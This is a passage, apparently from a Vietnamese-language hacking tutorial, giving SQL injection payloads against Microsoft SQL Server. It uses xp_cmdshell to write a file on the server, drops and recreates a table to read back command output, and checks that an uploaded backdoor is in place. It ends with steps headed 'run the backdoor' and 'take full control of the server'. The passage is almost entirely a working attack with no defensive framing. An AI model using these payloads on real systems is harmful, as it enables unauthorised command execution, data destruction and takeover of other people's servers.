1 exec master..xp_cmdshell "chube >>runfile.txt & hamhoc
>>runfile.txt"')--
'Kiểm tra xem backdoor đã upload thành công chưa
;drop table testip create table testip(stt int identity,dcip
varchar(1000)) insert into testip exec master..xp_cmdshell 'dir
runfile.txt'--
C. Chạy backdoor trên server
1. Xác nhận backdoor đã được kích hoạt
2. Chiếm toàn bộ quyền điều khiển server